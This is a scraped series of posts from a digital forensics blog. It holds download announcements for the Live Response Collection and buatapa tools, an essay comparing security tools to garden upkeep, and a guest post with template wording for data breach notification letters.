<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
<span style="font-size: large;">Updated: January 30, 2018</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you encounter any bugs or any have suggestions or feedback on the tool, please do not hesitate to let me know!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran, http://www.blogger.com/profile/10916463151597324052<br />
<span style="font-size: large;"><b>...at long last, updates to the Live Response Collection!!</b></span> (published 2015-08-20, updated 2019-10-17)<br />
<br />
<span style="font-size: large;">Hello again readers! I am happy to announce, after many long months in development (and due to a pretty busy six months, about six months later than I had originally planned) an updated version of the Live Response Collection is available!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first item that you will probably notice is that the Windows folder looks very different. I wanted to provide a cleaner look for users, so that when you run the LRC against a system it is easier to find the output folder. By having four main folders, instead of about 35, the results will be much easier to see. I moved all of the "tools" into the folder cleverly named "Tools", and all of the scripts into the similarly cleverly named folder "Scripts". While this does not change the function of the tools, it does slightly change the file paths leveraged by the old scripts, so you will have to update any custom changes that you made for your environment.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyzBVGQR9a2znuOQwHWzB2zDwoDHA3zBWh42ZtASLiOJ4wTF6BfazVvD9hmWqwmI2vD5cIfxw5jJ62KS57eHGoLTyVjk1jd086j8N6ZPkQ2AJrCb0ee4oS63epgdxEGOP3dDfBxul9zJQ/s1600/NewWindowsFolderStructure.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyzBVGQR9a2znuOQwHWzB2zDwoDHA3zBWh42ZtASLiOJ4wTF6BfazVvD9hmWqwmI2vD5cIfxw5jJ62KS57eHGoLTyVjk1jd086j8N6ZPkQ2AJrCb0ee4oS63epgdxEGOP3dDfBxul9zJQ/s640/NewWindowsFolderStructure.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">New Windows folder structure</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Within the "Scripts" folder I also began the process of what I am calling "Modules", which I started for several reasons. Since all six scripts share a lot of code and functionality, I wanted to reduce the overall size of each file by leveraging the code that they share. It makes maintenance and updates for the LRC easier. It also allows easier user customization, because instead of trying to figure out which large section of code you want to use (or not use), you can simply skip a module completely by replacing its name within the code itself. I plan on writing a future post detailing just how easy it is to write a customized module, complete with a breakout of the variables that the script(s) rely on, so users can add functionality and features more easily than ever (&lt;hint hint&gt; and hopefully you share them for inclusion in a future LRC release!)</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK5u0mVsx9YL1bw6AIq7qAmLQ-PCMs773GoIP0CeUKUvMTBIsjDJLRPr3xUDrI_dJ3mHicOlVWLCKEgyvZzGHIIeWsKyQgPfLBWbtpm1qPeS4JyxgKaeEazJ1oo9KljknmZC_vBCKI7gN/s1600/CurrentModules.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJK5u0mVsx9YL1bw6AIq7qAmLQ-PCMs773GoIP0CeUKUvMTBIsjDJLRPr3xUDrI_dJ3mHicOlVWLCKEgyvZzGHIIeWsKyQgPfLBWbtpm1qPeS4JyxgKaeEazJ1oo9KljknmZC_vBCKI7gN/s640/CurrentModules.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The beginnings of LRC "modules". There will be more!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As I stated, the overall functions of the LRC did not change terribly much: some Startup folder hashing was added, as was saving the autoruns output to csv, both of which will be touched on in my next blog post. The next post will also be the public release of a tool that is several months in the making, and likewise several months later than I had originally anticipated releasing it. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<div>
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran, http://www.blogger.com/profile/10916463151597324052<br />
<span style="font-size: large;"><b>Gardening, cyber security, and YOU!</b></span> (published 2015-07-14, updated 2015-07-16)<br />
<span style="font-size: large;">Hello again readers! We spent the first week of July on vacation in North Carolina and then I spent a few days last week at the SANS DFIR Summit in Austin. I was going to write a small recap of the DFIR Summit but I think Matt Bromiley summed it all up pretty <a href="http://www.505forensics.com/2015-dfir-summit/" target="_blank">well in his post</a> and I don't have much more to add, other than my favorite part of the DFIR Summit is actually seeing friends and colleagues in person and of course the sheer amount of networking opportunities. I personally would like to see more time allotted for networking, but there are so many quality presenters that it would be a shame to have fewer presentations.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This blog post is going to cover some additional thoughts that I had on the impromptu Incident Response panel on which I participated, led by <a href="https://twitter.com/carrier4n6" target="_blank">Brian Carrier</a>, and also included <a href="https://twitter.com/littlemac042" target="_blank">Frank McClain</a> and <a href="https://twitter.com/rwallace46" target="_blank">Rob Wallace</a>. One of the comments that I made regarding expensive cyber security tools was akin to "you can buy a screwdriver, but you cannot set it on a table and have it magically build you a house". Likewise, it doesn't matter how effectively written or well-thought out a tool is, at the end of the day, it is simply a tool. The functionality and quality of information (or work) that is produced by that tool is entirely dependent on the human that uses it. I could buy the most expensive, top-of-the-line, hammers, screwdrivers, saws, levels, shims (also a type of cache), nails, screws, and so on, but at the end of the day I do not have the skills needed to build a house. In fact, building Lego sets is about the extent of my construction capabilities. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Unfortunately a lot of vendors market their tool(s) as an "end-all-be-all solution". A lot of decision makers for businesses see this and decide to buy the latest and greatest tool but do not make any investment into the needed individuals to really harness the power of the tool. (My Cyber-Business-Guru/friend, Jack, would note that the mistake is assuming that the tool is a cost-savings over hiring expensive personnel. <b>You Must Have Both!</b>) </span><span style="font-size: large;">A good parallel with this can be made regarding our garden and our time away from home over the past few weeks; as you often come back to a garden that is completely unrecognizable from the one that you initially had.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Imagine that a vendor salesperson comes in and pitches the "EXTREME Cyber Security Protector 3000XL" as being able to "stop threats before they happen, in real-time, allowing instantaneous cyber security protection....(and a few other random buzzwords...synergy...end-to-end solution, cost savings, win-win, force multiplier...)". Of course the salesperson makes a great presentation (otherwise they would not be in sales long) and management decides to buy it.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTqQfg1l0uo5IjO1Rxs5M6KPUYIiTOEGW2eBlXpnnOrop6AC2ipgAlVI5SBhlt6RLvwcJ_ChgLg1T7GE7fDnq4J2IyUkiuh1_nuhG5VA6L3FEjb9x4VXB6bokJry799DV1bg1l-BBVpMe/s1600/shut-up-and-take-my-money.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTqQfg1l0uo5IjO1Rxs5M6KPUYIiTOEGW2eBlXpnnOrop6AC2ipgAlVI5SBhlt6RLvwcJ_ChgLg1T7GE7fDnq4J2IyUkiuh1_nuhG5VA6L3FEjb9x4VXB6bokJry799DV1bg1l-BBVpMe/s640/shut-up-and-take-my-money.jpg" width="640" /></a></span></div>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Sure, initially the tool may work fine, but these tools are never meant to be a "set it and forget it" solution. The same can be said about our garden. We kept up on doing regular maintenance, watering, and weeding our garden up until we went on vacation, so it looked similar to this despite our "purchase"* of the most <a href="http://www.amazon.com/PAW-44022-Electric-Battery-Wheelbarrow/dp/B00E2GKKMG" target="_blank">expensive wheelbarrow that I could find</a>:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Tu6IXO_g2CvdRkRcp4WyveklWYjBiXaRnhQr7iqf4GRPXLk1t9kG4jaDmS5Wy3dwlm5tsN69lSD-NcPAgqWol0eVkILGVtRarZ9KjarNCRFtzZE5W9VStLdHmj2pdhK0HavLPXOwXN8B/s1600/marigolds-newly-planted-in-the-vegetable-garden.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Tu6IXO_g2CvdRkRcp4WyveklWYjBiXaRnhQr7iqf4GRPXLk1t9kG4jaDmS5Wy3dwlm5tsN69lSD-NcPAgqWol0eVkILGVtRarZ9KjarNCRFtzZE5W9VStLdHmj2pdhK0HavLPXOwXN8B/s640/marigolds-newly-planted-in-the-vegetable-garden.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div style="text-align: center;">
<span style="font-size: small;"><i>Newly planted garden. Retrieved July 13, 2015 from http://www.livecreativelyinspired.com/wp-content/uploads/2014/07/marigolds-newly-planted-in-the-vegetable-garden.jpg</i></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
</td></tr>
</tbody></table>
<br />
<span style="font-size: large;">So far, so good, right? Well, <strike>we got quite a bit of rain</strike> it rained Miracle Grow for weeds while we were gone, and upon returning home we got even more rain on a regular basis. Due to all of the precipitation, we did not have an opportunity until this past weekend to perform the needed upkeep to get rid of the weeds and ensure we have a nice garden with the flowers and shrubs that we want, not milkweed, $#&%*! kudzu, and other weeds that we do not want. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZN5-78wHlw6O4IR816CuXoA5igEUmWu7OmT8lSP4p6olsV-HoaF437aHqd_BTw59oar7r5GPYt8IQARBf_yt6K9-uGKplOpXFBudMUPizx4LJMjEeeZcgoM-bVNHqaAIA9eTEZb8Xq0H/s1600/20100716garden2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkZN5-78wHlw6O4IR816CuXoA5igEUmWu7OmT8lSP4p6olsV-HoaF437aHqd_BTw59oar7r5GPYt8IQARBf_yt6K9-uGKplOpXFBudMUPizx4LJMjEeeZcgoM-bVNHqaAIA9eTEZb8Xq0H/s640/20100716garden2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>But ... we bought an expensive wheelbarrow. How did this happen?? Retrieved July 13, 2015 from http://www.waldeneffect.org/20100716garden2.jpg</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">I think that this is a perfect parallel: we have to perform regular maintenance on the garden to ensure that we have the plants that we want (i.e. our network, our data), or else we end up with something that is overrun with weeds and out of control (malware, toolbars, scareware). Having a good team of individuals helping ensure your "garden" (network and devices) is secure, regardless of the tool(s) that are used, is much more rewarding in the long run than spending large amounts of money on tools that just sit there and are rendered ineffective in a short period of time. In the end, it isn't about buying the fully automated, ridiculously expensive wheelbarrow; it is about the humans who filled it with all of the unwanted items that were running rampant in our garden.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaCcIZ2pno3dwxI8Vv7NLuuPRQihwd5Zu7pEe9G_Jp7PKAqbjuog-fyhpvSrKwH5Qf_lT4a_HfyX8aTTCKAdMgwlH7pYbNJYgYWCZ7qhdbbVK0c5RkmqEwMOVbWwcx2Mzuh-0KJGJrPa6i/s1600/weed-wagon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaCcIZ2pno3dwxI8Vv7NLuuPRQihwd5Zu7pEe9G_Jp7PKAqbjuog-fyhpvSrKwH5Qf_lT4a_HfyX8aTTCKAdMgwlH7pYbNJYgYWCZ7qhdbbVK0c5RkmqEwMOVbWwcx2Mzuh-0KJGJrPa6i/s640/weed-wagon.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Now where do you want this malware (weeds)? Retrieved July 13, 2015 from http://www.summerhouseart.com/blog/wp-content/uploads/2010/03/weed-wagon.jpg</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">*FULL DISCLAIMER: We did not really purchase the battery powered wheelbarrow and the photos above are not of our garden or our wheelbarrow. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran, http://www.blogger.com/profile/10916463151597324052<br />
<span style="font-size: large;"><b>How to Have that Awkward Conversation</b></span> (published 2015-06-16, updated 2015-06-16)<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers!! Today's post is the first (but most certainly not the last) "guest post" in which friends and colleagues can share their experiences and insights and give alternate perspectives on digital forensics, incident response, and information security. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Today's post is authored by my friend "Jack" who has much more experience (and an MBA) on the "business" side of forensics and incident response than I ever will (and let's be honest, I also will never have an MBA). "Jack" may or may not also be in the Witness Protection Program, but the OPM data breach might change that.....</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>(PS: Apparently cat memes are the number one attraction to blog posts, according to 87 out of 100 business professionals. The other 13 were no doubt scouring the internet for other pictures of cats.)</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<div style="text-align: center;">
<span style="font-size: large;"><b>How to Have that Awkward Conversation</b></span></div>
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b>By: "Jack"</b></span></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">NO, not the “It’s not you; it’s me!” one. The one where you tell your employees (or clients!) that you’ve been hacked, their information is who-knows-where, and oh by the way, you’ve got no idea how the bad guys even got in. You know. THAT one. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I’m not going to sugarcoat this. It’s going to be painful. It’s going to be embarrassing. But just like adults always tell kids, it is better to hear it directly from you. If the news media or banking institutions are notifying victims instead… oh boy; it’s a public relations nightmare. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">First rule of Data Breach Club: Talk first and say it loud. No one likes being indoctrinated into Data Breach Club, but I’ll let you in on a little secret: It’s not an exclusive membership. You’re either in the club, or you don’t know you’re already in the club. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiEDuScWvfJD_oJ74xjQIqjMBHDpLAF0GHP3tvAsyPZjAalXZ0ELZSzcQBcGIf_Tk0cGvo_L7txwwnl4vmvXwC4cDfOGaWKr3l1CGSQ4liBhZEDEjj1_C3WLGRCwQ_fQRsD_7k7X-mp8Yk/s1600/soembarrassed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiEDuScWvfJD_oJ74xjQIqjMBHDpLAF0GHP3tvAsyPZjAalXZ0ELZSzcQBcGIf_Tk0cGvo_L7txwwnl4vmvXwC4cDfOGaWKr3l1CGSQ4liBhZEDEjj1_C3WLGRCwQ_fQRsD_7k7X-mp8Yk/s400/soembarrassed.png" width="318" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you are upfront and honest, chances are better that you might maintain the relationships your organization has with its employees, partners, and clients. Further, you may not have a choice about public disclosure, or private disclosure, depending on contracts you have with clients. Depending on the laws where you operate, you may be obligated to provide full disclosure within a certain time period. Most state breach notification laws don’t specify what your notification should include; however, there are some minimum guidelines, which we attempt to cover in our samples below. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">In the State of Maryland for example, the Attorney General’s website says the following about data breach notifications:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div style="text-align: center;">
<i>Once a security breach is detected, a business must conduct in good-faith a reasonable and prompt investigation to determine whether the information that has been compromised has been or is likely to be misused, i.e. for identity theft. If the investigation shows that there is a reasonable chance that the data will be misused, that business must notify the affected consumers. </i></div>
<div style="text-align: center;">
<i>In the event of a security breach, notice must be given to consumers as soon as reasonably practicable following the investigation. A business may delay notification if requested by a law enforcement agency or to determine the scope of the breach, identify all the affected individuals or restore the integrity of the system. Notice to affected consumer must be given in writing and sent to the most recent address of the individual, or by telephone to the most recent phone number. Notice may be sent via e-mail if an individual has already consented to receive electronic notice or the business primarily conducts its business via the Internet. The law also contains a provision for substitute notice, allowing a business to provide notice of a security breach by e-mail, posting on its website and notice to statewide media if the cost of notice would exceed $100,000 or the number of consumers to be notified exceeds 175,000 individuals. (<a href="https://www.oag.state.md.us/idtheft/businessGL.htm">https://www.oag.state.md.us/idtheft/businessGL.htm</a>)</i></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Searching online for “data breach disclosure laws AND [your location]” should net you some relevant results. When in doubt, call a lawyer that specializes in data breaches. If the Google can’t find one, your local Bar Association should be able to assist you. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09GDw39-BW6LU1e703Ey89N1ctIUzTQOC-rIJ2o_gUL73OjJEObWlnXZZAKrIuiVHhqkD4CVKjghVZi1PS21osPesu42d1vfhJON3JP2m-0RXLtGL6WrQb_nv2maGpKw66rQHQSiRwnPd/s1600/rightmeow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09GDw39-BW6LU1e703Ey89N1ctIUzTQOC-rIJ2o_gUL73OjJEObWlnXZZAKrIuiVHhqkD4CVKjghVZi1PS21osPesu42d1vfhJON3JP2m-0RXLtGL6WrQb_nv2maGpKw66rQHQSiRwnPd/s400/rightmeow.png" width="231" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So how do you begin that notification email? Your letter should contain some version of the following:</span><br />
<span style="font-size: large;"><i>[ ] denote areas where you should fill in the blank</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part I—Introduce the Problem and Accept Responsibility: You need to be upfront and honest; if you have a lawyer advising differently, find a new lawyer (<i>Preferably one you suspect has a secret identity and fights crime at night using heightened senses resultant from a hazardous chemical spill; but I suppose if you can’t find one, any ethical data breach lawyer will do.</i>) If you don’t know something, say so. Trying to hide the fact that you don’t know something just makes you look like you are hiding something, which is usually assumed to be more sinister. Also, please don’t place blame on nation-states for a mess of your own creation; you’ll end up looking ridiculous and becoming the Poster Child of “What NOT to do”. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“We are contacting you because on [insert discovery date] we discovered a serious cyber-security incident that occurred between [Start Date] and [End Date] that involved a breach of your [personal information, such as medical records, credit card numbers, passwords, etc…]. At this time we do not believe that [other personal information] was accessed. We know you have trusted us with your information and we take that trust seriously. We take full responsibility for this incident and we will work tirelessly to resolve it quickly and completely.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">And if you delayed in sending notifications to victims, say why:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“In accordance with applicable laws, we delayed notification of affected parties by 30 days, due to an official request by law enforcement.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part II—Here’s What Is Happening Now: This is where you tell them what you are doing to fix this problem. (Not diverting attention, not doing just enough to get regulators off your back, not putting on a show to restore stock prices, not doing the minimum for regulatory compliance or limiting your liability. Actually fixing the problem. Let me say it again for dramatic effect: </span><b><u><span style="font-size: x-large;">Actually.Fixing.The.Problem.</span></u></b><span style="font-size: large;">) </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh73HC8r6UIalO_H0qrvLVGPm630BUQBxmbiUxPEAtDPK-gSTEGBE9ei7ZH8YZfDsrXx-utOPm518dcuYViBJYJ79_I8VENayRKi9RxkrO0YsAVowg1td4QpGWILgY6M6gS-EMCc6Z1885J/s1600/dramatic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh73HC8r6UIalO_H0qrvLVGPm630BUQBxmbiUxPEAtDPK-gSTEGBE9ei7ZH8YZfDsrXx-utOPm518dcuYViBJYJ79_I8VENayRKi9RxkrO0YsAVowg1td4QpGWILgY6M6gS-EMCc6Z1885J/s400/dramatic.png" width="400" /></a></div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You’ll want to (or be required to) at least cover what you did to stop the attackers, what you are doing to clean up the breach, and what changes you will make in the future. Your notification should say some version of the following; pick and choose based on your circumstances: </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“Upon discovery we immediately blocked the offending IPs and shut down all out-bound traffic. We have begun the process of finding compromised machines.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“We brought in cyber-security experts to investigate and fix this problem entirely and to ensure that we are more secure in the future.” </i> </span><br />
<span style="font-size: large;"><br /></span><span style="font-size: large;"><i>“We advised the credit reporting bureaus and banks of this incident. We are offering a free credit report to every affected party, and here’s how to do that. [Instructions here.]” </i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We are cooperating fully with law enforcement and an investigation is on-going. There will be full participation and transparency during the investigation. Employees will be contacted in person if their assistance is required. Do not provide any personal information, account numbers or passwords to any unverified person via email or on the phone, now or ever.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We are currently dedicating money to invest in our IT infrastructure, our security personnel, and monitoring tools so that attacks in the future are thwarted.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part III—Here’s What the User Has to Do: This is where you tell your employees, clients, customers, and/or partners what they need to do. You must be exceedingly firm about password changes and policy enforcement while at the same time making this VERY easy for them. It’s a huge component of rebuilding trust and being transparent throughout the process. You’ll want to take note of the inclusion of an attachment, which should detail cyber-security best practices that they can use at work or at home. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“You will be required to choose a new password before you can log into your account. <u>Everyone must do this</u>, from the newest employee to the CEO of the company—even every member of the IT team, including admin accounts. It may NOT be the same password as last time. Your password will be required to have upper and lower case letters, a number, and a symbol. You cannot use dictionary words. It must also be at least 8 characters in length. <u>We apologize for the inconvenience, but this is a very important part of information security.</u> It removes the attacker’s access to our network. <u>Thoroughness of this step is paramount.</u>” </i> </span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wQTVgSAdiA7RZY44cctNz3-5COQiKddF5S9uzfwAdRQXdPR3KiIlAJVQhGqy-u_k3FqUcTNJxYhDRJg9HrnCYsVvYqoZfsYnQrq10BAQyCxwNEwGHrwvvsKJfdiUGcSy2ivxZP64n9Ft/s1600/gangsigns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6wQTVgSAdiA7RZY44cctNz3-5COQiKddF5S9uzfwAdRQXdPR3KiIlAJVQhGqy-u_k3FqUcTNJxYhDRJg9HrnCYsVvYqoZfsYnQrq10BAQyCxwNEwGHrwvvsKJfdiUGcSy2ivxZP64n9Ft/s640/gangsigns.png" width="640" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><i>“You may wish to place a fraud alert or freeze on your credit report, which you can do by contacting the three major credit reporting bureaus, Equifax, Experian, and TransUnion [insert contact info here]. Be aware that you will not be able to borrow money or open a new credit card until you lift the freeze.”</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“If your bank has not contacted you about replacing your cards, you may wish to proactively call them and ask for a replacement card.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>“We recommend following industry standards and best practices when it comes to cyber security. The attached document details steps you can take to better protect yourself from online threats, both professionally and personally. There is even a section included that focuses on online safety for kids and teens.”</i> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Part IV—We are Here to Help You: This is where you point people to your public relations team, who in turn can run point between the employees/clients/partners and the legal team, technical team, management team, etc… </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvjmmE4h43uI-sL2jMSc46U0OqlD_NNRArTXXMaFQz3mVzHSXb7ThI1zR0H-YkfLGvH1xL9MU0LMKbmqTHYPUAk2f15TCHVBiaja1sq6XfrxmAl28W4OX5010OpeggZQpPK5DQt_g2Qd2/s1600/callz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXvjmmE4h43uI-sL2jMSc46U0OqlD_NNRArTXXMaFQz3mVzHSXb7ThI1zR0H-YkfLGvH1xL9MU0LMKbmqTHYPUAk2f15TCHVBiaja1sq6XfrxmAl28W4OX5010OpeggZQpPK5DQt_g2Qd2/s640/callz.png" width="640" /></a></div>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">What? You don’t have a public relations team/person? Didn’t anyone tell you that this is a key part of a data breach incident? This is one of those indirect costs of data breaches that no one ever considers during the risk management process. Yes, it will cost money; you didn’t think data breaches were cheap did you? Please note the inclusion of a <u>toll-free number</u> and the promise of regular updates. We define “regular” as at least every two weeks. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>“If you have any questions or concerns, you may contact our offices at: [1-800-555-5555] or email us at [company@ourcompany.com]. Our website: [www.ourcompany.com] will be updated with the latest information as our investigation continues.”</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
